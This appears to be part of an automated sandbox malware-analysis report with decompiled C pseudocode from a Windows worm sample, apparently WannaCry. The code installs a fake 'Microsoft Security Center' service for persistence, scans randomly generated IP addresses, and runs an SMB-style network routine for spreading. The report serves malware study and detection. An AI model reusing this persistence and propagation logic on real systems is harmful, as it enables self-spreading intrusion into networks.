            0x00407233
            0x0040723c
            0x00407249
            0x0040724c
            0x00407256
            0x00407258
            0x00407258
            0x0040725a
            0x00407265
            0x00407266
            0x00407267
            0x00407268
            0x00407270
            0x00407272
            0x0040727b
            0x00407280
            0x00407281
            0x00407282
            0x00407282
            0x00407270
            0x0040728c
            0x00000000
            0x00407101
            0x00407101
            0x0040710b
            0x0040711a
            0x00407127
            0x0040712b
            0x0040712f
            0x00407140
            0x00407148
            0x0040715d
            0x00407160
            0x00407164
            0x00407164
            0x00407166
            0x0040716d
            0x00407173
            0x00407178
            0x00407179
            0x0040717a
            0x00407182
            0x00000000
            0x00000000
            0x00407184
            0x0040718d
            0x00407192
            0x00407193
            0x00407194
            0x0040719c
            0x004071b0
            0x004071b9
            0x004071bd
            0x004071c1
            0x00407107
            0x00000000
            0x00407107
            0x004071c1
            0x00000000
            0x0040719c
            0x00000000
            0x0040710b
            0x004070fb

            APIs
            • GlobalAlloc.KERNEL32(00000040,0000180C), ref: 00406FEB
            • send.WS2_32(?,?,00001052,00000000), ref: 0040717A
            • recv.WS2_32(?,?,00001000,00000000), ref: 00407194
            • htons.WS2_32(?), ref: 004071D3
            • send.WS2_32(?,?,?,00000000), ref: 00407268
            • recv.WS2_32(?,?,00001000,00000000), ref: 00407282
            • GlobalFree.KERNEL32 ref: 0040728C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Globalrecvsend$AllocFreehtons
            • String ID: R$XB
            • API String ID: 2499408064-887094464
            • Opcode ID: a889ab95c7702b96a90eebd94a048c396ca20449bf3ff93c22cb7b9eff7d00f1
            • Instruction ID: 4c1efdbd1725d41cac0ffbde0867fe990468cc20af3f1bbb6c1bd8f9cce8fdf0
            • Opcode Fuzzy Hash: a889ab95c7702b96a90eebd94a048c396ca20449bf3ff93c22cb7b9eff7d00f1
            • Instruction Fuzzy Hash: 929151716083458BD724CF25C84069BB7E1FFC8704F444A3EFA99A7381D778AA09CB5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 100%
            			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






            0x00407c56
            0x00407c6e
            0x00407c72
            0x00407cd3
            0x00407c74
            0x00407ca7
            0x00407cab
            0x00407cb2
            0x00407cb9
            0x00407cb9
            0x00407cbc
            0x00407cc9
            0x00407cc9

            APIs
            • sprintf.MSVCRT ref: 00407C56
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FD8FB10,00000000), ref: 00407C9B
            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
            • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
            • API String ID: 3340711343-4063779371
            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = E00408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










            0x0040809f
            0x004080a5
            0x004080ab
            0x004080ae
            0x004080c9
            0x004080cb
            0x004080cd
            0x004080e8
            0x004080ea
            0x004080ec
            0x004080f1
            0x004080fa
            0x004080fa
            0x004080fd
            0x00408100
            0x00408105
            0x0040810e
            0x00408116
            0x0040811e
            0x00408130
            0x004080b0
            0x004080b8
            0x004080b8

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
            • __p___argc.MSVCRT ref: 004080A5
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FD8FB10,00000000,?,004081B2), ref: 004080DC
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
            • String ID: mssecsvc2.0
            • API String ID: 4274534310-3729025388
            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407660 Relevance: 6.0, APIs: 4, Instructions: 20encryptionCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00407660() {
				BYTE* _t7;

				if( *0x70f870 != 0) {
					EnterCriticalSection(0x431418);
					CryptGenRandom( *0x70f870, 4, _t7);
					LeaveCriticalSection(0x431418);
					return  *_t7;
				} else {
					return rand();
				}
			}




            0x00407668
            0x00407677
            0x0040768b
            0x00407696
            0x004076a1
            0x0040766a
            0x00407671
            0x00407671

            APIs
            • rand.MSVCRT ref: 0040766A
            • EnterCriticalSection.KERNEL32(00431418), ref: 00407677
            • CryptGenRandom.ADVAPI32(?,00000004,00000000), ref: 0040768B
            • LeaveCriticalSection.KERNEL32(00431418), ref: 00407696
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CriticalSection$CryptEnterLeaveRandomrand
            • String ID:
            • API String ID: 2546132801-0
            • Opcode ID: c0ac807a879424b57b2593f61ffd835e3bddb04690acba1e13808fb65da8fefa
            • Instruction ID: 79280cadd07851808ca7e30a6006644a6cb4e0e15ada81f4a163105091244b64
            • Opcode Fuzzy Hash: c0ac807a879424b57b2593f61ffd835e3bddb04690acba1e13808fb65da8fefa
            • Instruction Fuzzy Hash: A0E04670200305EBC7149F68ED08F9637A8FB88312B108039F542D21A0DB38D4108B2F
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407620 Relevance: 3.0, APIs: 2, Instructions: 24encryptionCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00407620() {
				int _t4;
				signed int _t6;

				_t6 = 0;
				while(1) {
					asm("sbb eax, eax");
					_t4 = CryptAcquireContextA(0x70f870, 0,  ~_t6 & "Microsoft Base Cryptographic Provider v1.0", 1, 0xf0000000);
					if(_t4 != 0) {
						break;
					}
					_t6 = _t6 + 1;
					if(_t6 < 2) {
						continue;
					}
					break;
				}
				InitializeCriticalSection(0x431418);
				return _t4;
			}





            0x00407628
            0x0040762a
            0x00407633
            0x00407644
            0x00407648
            0x00000000
            0x00000000
            0x0040764a
            0x0040764e
            0x00000000
            0x00000000
            0x00000000
            0x0040764e
            0x00407655
            0x0040765d

            APIs
            • CryptAcquireContextA.ADVAPI32(0070F870,00000000,00000000,00000001,F0000000), ref: 00407644
            • InitializeCriticalSection.KERNEL32(00431418), ref: 00407655
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AcquireContextCriticalCryptInitializeSection
            • String ID:
            • API String ID: 1845266067-0
            • Opcode ID: 9601f4eae6ca377f6814d4b8d706f325617b2b0623dd4cff3c79478e8e2586aa
            • Instruction ID: bf0ae1558cdef70b38d16702ada48a22b4e05866b10c127fd1ad32b4c00b0ea1
            • Opcode Fuzzy Hash: 9601f4eae6ca377f6814d4b8d706f325617b2b0623dd4cff3c79478e8e2586aa
            • Instruction Fuzzy Hash: 30E02B32B8073465D620163D6C06FD345C8C7BCF75F121132FA02F20D0D1A9D84241EE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00407840 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 145threadsleepsynchronizationCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 86%
            			E00407840(intOrPtr _a4) {
				char _v260;
				char _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				void* _t41;
				long _t42;
				int _t56;
				void* _t57;
				int _t61;
				void* _t62;
				intOrPtr _t70;
				signed int _t71;
				long _t90;
				intOrPtr _t91;
				int _t93;
				void* _t95;
				signed int _t98;
				void* _t101;

				_t70 = 1;
				_v280 = 1;
				_v276 = 1;
				_t90 = GetTickCount();
				__imp__time( &_v264);
				_t41 = GetCurrentThread();
				_t42 = GetCurrentThreadId();
				srand(GetTickCount() + _v264 + _t41 + _t42);
				_t98 = _v268;
				_t101 =  &_v280 + 8;
				L1:
				while(1) {
					L1:
					if(GetTickCount() - _t90 > 0x249f00) {
						_v280 = _t70;
					}
					if(GetTickCount() - _t90 > 0x124f80) {
						_v276 = _t70;
					}
					if(_v280 == 0 || _a4 >= 0x20) {
						goto L9;
					}
					_t98 = E00407660() % 0xff;
					if(_t98 == 0x7f || _t98 >= 0xe0) {
						continue;
					}
					L9:
					if(_v276 != 0 && _a4 < 0x20) {
						_v272 = E00407660() % 0xff;
					}
					_t71 = E00407660() % 0xff;
					_t56 = sprintf( &_v260, "%d.%d.%d.%d", _t98, _v272, _t71, E00407660() % 0xff);
					_push( &_v260);
					L004097D4();
					_t57 = E00407480(_t56);
					_t101 = _t101 + 0x1c;
					if(_t57 <= 0) {
						L22:
						Sleep(0x64);
						_t70 = 1;
						continue;
					} else {
						_v284 = 0;
						_v280 = 0;
						_v272 = GetTickCount();
						_t91 = 1;
						do {
							_t61 = sprintf( &_v264, "%d.%d.%d.%d", _t98, _v276, _t71, _t91);
							_push( &_v264);
							L004097D4();
							_t93 = _t61;
							_t62 = E00407480(_t93);
							_t101 = _t101 + 0x1c;
							if(_t62 <= 0) {
								L19:
								Sleep(0x32);
								goto L20;
							}
							__imp___beginthreadex(0, 0, E00407540, _t93, 0, 0);
							_t95 = _t62;
							_t101 = _t101 + 0x18;
							if(_t95 == 0) {
								goto L20;
							}
							if(WaitForSingleObject(_t95, 0x36ee80) == 0x102) {
								TerminateThread(_t95, 0);
							}
							CloseHandle(_t95);
							goto L19;
							L20:
							_t91 = _t91 + 1;
						} while (_t91 < 0xff);
						_t90 = _v276;
						goto L22;
					}
				}
			}
























            0x0040784f
            0x00407855
            0x00407859
            0x0040785f
            0x00407866
            0x0040786f
            0x00407877
            0x0040788a
            0x00407890
            0x00407894
            0x00000000
            0x00407897
            0x00000000
            0x004078a0
            0x004078a2
            0x004078a2
            0x004078af
            0x004078b1
            0x004078b1
            0x004078bb
            0x00000000
            0x00000000
            0x004078d5
            0x004078da
            0x00000000
            0x00000000
            0x004078e4
            0x004078ea
            0x00407904
            0x00407904
            0x00407916
            0x00407938
            0x00407945
            0x00407946
            0x0040794c
            0x00407951
            0x00407956
            0x00407a04
            0x00407a06
            0x00407a0c
            0x00000000
            0x0040795c
            0x0040795e
            0x00407962
            0x00407968
            0x0040796c
            0x00407971
            0x00407983
            0x00407990
            0x00407991
            0x00407996
            0x00407999
            0x0040799e
            0x004079a3
            0x004079e5
            0x004079e7
            0x00000000
            0x004079e7
            0x004079b3
            0x004079b9
            0x004079bb
            0x004079c0
            0x00000000
            0x00000000
            0x004079d3
            0x004079d8
            0x004079d8
            0x004079df
            0x00000000
            0x004079ed
            0x004079ed
            0x004079ee
            0x004079fa
            0x00000000
            0x004079fe
            0x00407956

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CountTick$Thread$CurrentSleepinet_addrsprintf$CloseHandleObjectSingleTerminateWait_beginthreadexsrandtime
            • String ID: $%d.%d.%d.%d
            • API String ID: 4176435924-479890864
            • Opcode ID: f363e766c160667d018656684faa2d49ba2bc9810b5ba48cecf977b80b72a8e1
            • Instruction ID: f124348fcd1d090d882ca1a3a3b8ac5e7e4d7abd695b8a166d734543007768a5
            • Opcode Fuzzy Hash: f363e766c160667d018656684faa2d49ba2bc9810b5ba48cecf977b80b72a8e1
            • Instruction Fuzzy Hash: 7341E371E083055BE310AF75DD49B6B76D9AF88304F04483FF549F2291D67CE9148A9B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401370 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 218networksleepCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 159 401370-4013c7 call 409860 GetTickCount call 401d80 call 4082c0 166 4013cc-4013fd GetTickCount 159->166 167 401416 166->167 168 4013ff-401414 _ftol call 401660 166->168 170 401418-401431 GetTickCount 167->170 168->170 172 4014b1-4014b5 170->172 173 401433-40146a inet_addr htons socket 170->173 174 4014b7-4014e3 call 408390 closesocket 172->174 175 4014e8-4014eb 172->175 176 401470-401480 connect 173->176 177 40162a-401639 call 401310 173->177 189 40160d-401619 174->189 179 401565-401569 175->179 180 4014ed-40155a call 401190 call 408390 send 175->180 182 401486-4014ac call 408390 176->182 183 40163a-40163b closesocket 176->183 179->189 190 40156f-4015ac call 408390 recv 179->190 188 401640-40165a call 401310 Sleep 180->188 202 401560 180->202 182->189 183->188 189->166 192 40161f-401629 189->192 190->188 199 4015b2-4015b6 190->199 199->189 201 4015b8-4015cc _stricmp 199->201 203 4015e4-4015f5 _stricmp 201->203 204 4015ce-4015e0 201->204 202->189 203->189 205 4015f7-401609 203->205 204->203 205->189
            C-Code - Quality: 53%
            			E00401370(void* __ecx, char* __edx, void* __eflags, signed long long __fp0, char _a1, char _a2, char _a3, signed char _a4, int _a8, char _a12, int _a16, int _a24, signed long long _a28, int _a40, void* _a44, void* _a48, long _a52, int _a56, char _a64, void* _a66, void* _a72, void* _a80, void* _a88, void* _a96, char _a108, void* _a109, void* _a112, void* _a113, void* _a2144, void* _a2152, void* _a12156) {
				char _v0;
				void* _v4;
				void* _v8;
				void* _v10;
				void* _v12;
				void* _v33;
				void* _v34;
				void* _v35;
				void* _v36;
				intOrPtr* _t77;
				signed char _t80;
				short _t82;
				void* _t85;
				void* _t89;
				char* _t95;
				intOrPtr _t127;
				void* _t131;
				intOrPtr* _t135;
				void* _t137;
				void* _t140;
				void* _t141;
				signed long long _t152;
				signed long long _t153;

				_t119 = __edx;
				E00409860(0x2f84, __ecx);
				_v0 = 0;
				_a1 = 8;
				_a2 = 0;
				_a3 = 8;
				_a4 = GetTickCount();
				_a8 = 0;
				asm("fild qword [esp+0x14]");
				_a28 = __fp0;
				E00401D80();
				_t77 =  *0x43146c; // 0x0
				E004082C0(0x431468,  &_a4,  *_t77, _t77);
				_t135 = 0x431480;
				do {
					_t152 =  *(_t135 + 0x2720) *  *0x40a190;
					 *(_t137 + 0x5c) = _t152;
					_t80 = GetTickCount();
					_a4 = _t80;
					_a8 = 0;
					asm("fild qword [esp+0x14]");
					_t153 = _t152 - _a28;
					asm("fsubr qword [esp+0x5c]");
					asm("fcom qword [0x40a188]");
					asm("fnstsw ax");
					if((_t80 & 0x00000041) != 0) {
						st0 = _t153;
					} else {
						_t153 = _t153 *  *0x40a190;
						L00409890();
						E00401660(_t80, _t119);
						_t137 = _t137 + 8;
					}
					_a52 = GetTickCount();
					_t82 =  *_t135;
					_a56 = 0;
					asm("fild qword [esp+0x44]");
					_a28 = _t153;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82;
							if(__eflags != 0) {
								__eflags = _t82 - 1;
								if(_t82 != 1) {
									goto L20;
								} else {
									_t54 = _t135 + 4; // 0x0
									_push( &_a12);
									_push(_t137 + 0x54);
									_a12 =  *_t54;
									_a16 = 0;
									E00408390();
									_push(0);
									_t82 =  &_a108;
									_push(0x800);
									_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x54)) + 0x10));
									_push(_t82);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x54)) + 0x10)));
									L004097B6();
									__eflags = _t82 - 0xffffffff;
									if(_t82 == 0xffffffff) {
										goto L24;
									} else {
										__eflags =  *((intOrPtr*)(_t135 + 8)) - 3;
										if( *((intOrPtr*)(_t135 + 8)) > 3) {
											_t63 = _t135 + 0xc; // 0x43148c
											_t131 = _t63;
											__imp___stricmp(_t131, "treeid");
											_t140 = _t137 + 8;
											__eflags = _t82;
											if(_t82 == 0) {
												_t82 =  *((intOrPtr*)(_t140 + 0xa0));
												 *((char*)(_t140 + 0x12)) = _t82;
												 *((char*)(_t140 + 0x13)) =  *((intOrPtr*)(_t140 + 0xa1));
											}
											__imp___stricmp(_t131, "userid");
											_t137 = _t140 + 8;
											__eflags = _t82;
											if(_t82 == 0) {
												_t119 =  *((intOrPtr*)(_t137 + 0xa4));
												_t82 =  *((intOrPtr*)(_t137 + 0xa5));
												 *((char*)(_t137 + 0x10)) =  *((intOrPtr*)(_t137 + 0xa4));
												 *((char*)(_t137 + 0x11)) = _t82;
											}
										}
										goto L20;
									}
								}
							} else {
								memset(_t137 + 0x884, 0, 0x9c4 << 2);
								_t141 = _t137 + 0xc;
								_push( &_a2);
								_t44 = _t135 + 8; // 0x0
								_push( &_v0);
								_push(_t141 + 0x884);
								_t45 = _t135 + 0xc; // 0x43148c
								_push( *_t44);
								_t89 = E00401190(__eflags);
								_t137 = _t141 + 0x14;
								_t47 = _t135 + 4; // 0x0
								_push(_t137 + 0x34);
								_push(_t137 + 0x74);
								 *((intOrPtr*)(_t137 + 0x3c)) =  *_t47;
								_a40 = 0;
								E00408390();
								_push(0);
								_t82 = _t137 + 0x888;
								_push(_t89);
								_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x74)) + 0x10));
								_push(_t82);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x74)) + 0x10)));
								L004097BC();
								__eflags = _t82 - 0xffffffff;
								if(_t82 == 0xffffffff) {
									goto L24;
								} else {
									goto L20;
								}
							}
						} else {
							_t32 = _t135 + 4; // 0x0
							_push(_t137 + 0x24);
							_push( &_a108);
							 *((intOrPtr*)(_t137 + 0x2c)) =  *_t32;
							_a24 = 0;
							E00408390();
							_t119 =  *((intOrPtr*)(_t137 + 0x7c));
							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x7c)) + 0x10));
							_push(_t82);
							L004097B0();
							goto L20;
						}
					} else {
						 *((short*)(_t137 + 0x64)) = _t82;
						_push( *((intOrPtr*)(_t137 + 0x2f98)));
						L004097D4();
						 *((intOrPtr*)(_t137 + 0x68)) = _t82;
						_push( *((intOrPtr*)(_t137 + 0x2f9c)));
						L004097CE();
						_push(0);
						_push(1);
						_push(2);
						 *((short*)(_t137 + 0x72)) = _t82;
						L004097C8();
						_t127 = _t82;
						if(_t127 == 0xffffffff) {
							return E00401310();
						} else {
							_t95 =  &_a64;
							_push(0x10);
							_push(_t95);
							_push(_t127);
							L004097C2();
							if(_t95 == 0xffffffff) {
								_push(_t127);
								L004097B0();
								L24:
								_t85 = E00401310();
								Sleep(0x3e8);
								return _t85;
							} else {
								_t25 = _t135 + 4; // 0x0
								_t119 =  &_a12;
								_a12 =  *_t25;
								_push( &_a12);
								_push( &_a28);
								_a16 = 0;
								_t82 = E00408390();
								 *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x4c)) + 0x10)) = _t127;
								goto L20;
							}
						}
					}
					L25:
					L20:
					_t135 = _t135 + 0x2728;
				} while (_t135 < 0x5ffd08);
				return _t82;
				goto L25;
			}


























            0x00401370
            0x00401375
            0x00401388
            0x0040138c
            0x00401390
            0x00401394
            0x0040139a
            0x0040139e
            0x004013a2
            0x004013a6
            0x004013aa
            0x004013af
            0x004013c2
            0x004013c7
            0x004013cc
            0x004013d2
            0x004013d8
            0x004013dc
            0x004013de
            0x004013e2
            0x004013e6
            0x004013ea
            0x004013ee
            0x004013f2
            0x004013f8
            0x004013fd
            0x00401416
            0x004013ff
            0x004013ff
            0x00401405
            0x0040140c
            0x00401411
            0x00401411
            0x0040141a
            0x0040141e
            0x00401421
            0x00401429
            0x0040142d
            0x00401431
            0x004014b1
            0x004014b5
            0x004014e8
            0x004014eb
            0x00401565
            0x00401569
            0x00000000
            0x0040156f
            0x0040156f
            0x0040157a
            0x0040157b
            0x00401581
            0x00401585
            0x00401589
            0x00401592
            0x00401593
            0x0040159a
            0x0040159f
            0x004015a2
            0x004015a3
            0x004015a4
            0x004015a9
            0x004015ac
            0x00000000
            0x004015b2
            0x004015b2
            0x004015b6
            0x004015b8
            0x004015b8
            0x004015c1
            0x004015c7
            0x004015ca
            0x004015cc
            0x004015ce
            0x004015dc
            0x004015e0
            0x004015e0
            0x004015ea
            0x004015f0
            0x004015f3
            0x004015f5
            0x004015f7
            0x004015fe
            0x00401605
            0x00401609
            0x00401609
            0x004015f5
            0x00000000
            0x004015b6
            0x004015ac
            0x004014ed
            0x004014ff
            0x004014ff
            0x0040150c
            0x0040150d
            0x00401510
            0x00401511
            0x00401512
            0x00401515
            0x00401517
            0x0040151c
            0x00401525
            0x0040152c
            0x0040152d
            0x00401533
            0x00401537
            0x0040153b
            0x00401544
            0x00401545
            0x0040154c
            0x0040154d
            0x00401550
            0x00401551
            0x00401552
            0x00401557
            0x0040155a
            0x00000000
            0x00401560
            0x00000000
            0x00401560
            0x0040155a
            0x004014b7
            0x004014b7
            0x004014c2
            0x004014c3
            0x004014c9
            0x004014cd
            0x004014d1
            0x004014d6
            0x004014da
            0x004014dd
            0x004014de
            0x00000000
            0x004014de
            0x00401433
            0x0040143a
            0x0040143f
            0x00401440
            0x0040144c
            0x00401450
            0x00401451
            0x00401456
            0x00401457
            0x00401459
            0x0040145b
            0x00401460
            0x00401465
            0x0040146a
            0x00401639
            0x00401470
            0x00401470
            0x00401474
            0x00401476
            0x00401477
            0x00401478
            0x00401480
            0x0040163a
            0x0040163b
            0x00401640
            0x00401640
            0x0040164a
            0x0040165a
            0x00401486
            0x00401486
            0x00401489
            0x00401491
            0x00401495
            0x00401496
            0x0040149c
            0x004014a0
            0x004014a9
            0x00000000
            0x004014a9
            0x00401480
            0x0040146a
            0x00000000
            0x0040160d
            0x0040160d
            0x00401613
            0x00401629
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 00401398
            • GetTickCount.KERNEL32 ref: 004013DC
            • _ftol.MSVCRT ref: 00401405
              • Part of subcall function 00401660: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00401677
              • Part of subcall function 00401660: __allrem.LIBCMT ref: 00401687
              • Part of subcall function 00401660: Sleep.KERNEL32(?,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016BE
            • GetTickCount.KERNEL32 ref: 00401418
